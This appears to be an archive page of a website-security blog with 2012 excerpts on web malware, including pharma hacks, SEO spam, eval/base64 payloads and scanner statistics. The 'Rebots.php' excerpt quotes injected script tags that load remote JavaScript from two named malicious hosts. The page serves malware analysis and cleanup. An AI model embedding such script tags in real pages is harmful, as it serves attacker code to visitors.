If you’re a WordPress user, love our free SiteCheck scanner, or already use our free SiteCheck Malware Scanner Plugin for WordPress, we have an update for you.
Joomla Pharma Hack – Web Malware Removal
November 6, 2012 by 2 Comments
In my last SEO poisoning post I wrote about some really nasty conditional malware. In this one, we’re going to revert our attention to the more common variation of the attack, and look at the Joomla CMS.
This variation will be the Pharma hack. As of late, it seems to be going on a rampage on a number of CMS applications and many of its characteristics are similar. The objective appears to be clear though, find its way into Google’s search engine result pages (SERP).
While we can only speculate, the idea is simple – The SERPs are a cached product and as long as they keep the injections benign of malware they increase their odds of bypassing detection until someone spots it and reports.
Read More
Ask Sucuri: How does SiteCheck work?
October 20, 2012 by 5 Comments
If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.
Question: How does SiteCheck work? I just scanned a site that I think is compromised but the scanner is showing it as clean. Is my site really clean or did you make a mistake?
Answer: SiteCheck is our free, remote website scanner that works to identify if the provided site is infected with any type of malware (including SPAM) or if it’s been blacklisted or defaced.
Read More
Dealing with WordPress Malware
October 11, 2012 by 8 Comments
A few months back I contributed to a post with Smashing Magazine on the top 4 WordPress Infections, it was released yesterday, and it couldn’t have been at a better time. If any one attended WordCamp Las Vegas you might even find some similarities. Fortunately in the process of preparing for the event and working with the team, we were able to compile a bit more information expanding on the things we originally discussed in the last post. It’s perfect timing for a number of reasons, and will complement this post very nicely.
The idea of this post, like many in the past, is to outline and discuss this past weekend’s presentation. In the process, hopefully you take something away. Unfortunately, the presentation was capped off with a live attack and hack, and I won’t be able to include that in this post, but I promise it’s coming.
**Note: If you plan to be at WordCamp Philadelphia 2012 you might be in for some treats, just saying. And if you don’t have it on the calendar, you should.
Read More
Rebots.php JavaScript Malware Being Actively Injected
August 24, 2012 by 7 Comments
Holy JavaScript malware, Batman! On August 11th we started seeing the Rebot JavaScript malware string injected on various websites. Since then, it has increased its appearances, and has variated the way it’s being included on the infected sites.
When you visit a compromised site, it will attempt to load an additional JavaScript, like one of these:
<script src="http://lig-limp.com.br/rebots.php".. <script; src="http://chezbruna.com.br/imagens/rebots.php"..
SiteCheck – Got Blackhat SEO Spam Warning?
August 16, 2012 by 2 Comments
As of late it seems like we’re talking about a lot of SPAM related cases, this post will be no different.
Before you start, let me preface this by saying that clearing a Blackhat SEO Spam injection is probably the biggest PITA (Google It) infection there is. They constantly evolve, making them difficult to detect and they employ both new and old techniques that, even after years, still prove to be annoying. This post will demonstrate one such case.
Read More
Website Cross-contamination: Blackhat SEO Spam Malware
March 30, 2012 by 8 Comments
We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.
We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:
Read More
Conditional Redirect Malware Decoded – Eval base64_decode Example
March 14, 2012 by 3 Comments
I have this beautiful website and now there’s all this garbled code across all of my PHP files. What’s it do, and how did it get there?
This is a quick post to show you some encoded crud that can attack your site, and do some pretty bad stuff.
Encoded Payload – Eval( base64_decode)
Generally speaking, we see this type of payload dropped into PHP, HTML, and JavaScript files. They are typically dropped into an environment through a known vulnerability in outdated software. This isn’t the only entry point, but definitely the one we see the most.
Read More
Sucuri SiteCheck – Web Malware Distribution – January 2012
February 10, 2012 by 1 Comment
As many know, we have been offering our free website malware scanner – Sucuri SiteCheck, since early in 2011. In our commitment to continue to give back to the community, we want to share some statistics. We’d like to share the distribution of infections based on the number of sites that are being scanned using Sucuri SiteCheck.
In January, we scanned a couple 100 thousand sites. From those we were able to better understand the distribution of malware.
Vote SPAM For President: New Election Tactics or Same Old Tricks?
The United States presidential campaign is going full force, and it’s been a doozy. We don’t typically get involved with political situations, short of cleaning some of the crazy defacements we see, this is an exception.
This election campaign has brought its typical bashing via commercials, the usual rhetoric we see in interviews, and even those cool vote for (plug in your favorite candidate) stickers. My personal favorite was the vice presidential debate which left me feeling like I was on the grade school playground making faces and sticking my tongue out at the resident bully.
Times have adapted a bit, and the tactics have changed along with the advancements in communications, and social interaction. Twitter discussions boasting crazy statistics, Facebook posts about how awesome each candidate is, all of these have even spawned interesting debate and discussion in my own social groups.
Apparently, the crazy and debatably bad tactics stem beyond the historical mediums into our lovely world of geek. I guess it was only a matter of time.
We have drummed up a couple of theories on how this happened, ultimately it’s up to you to decide. More on that at the end.
Read More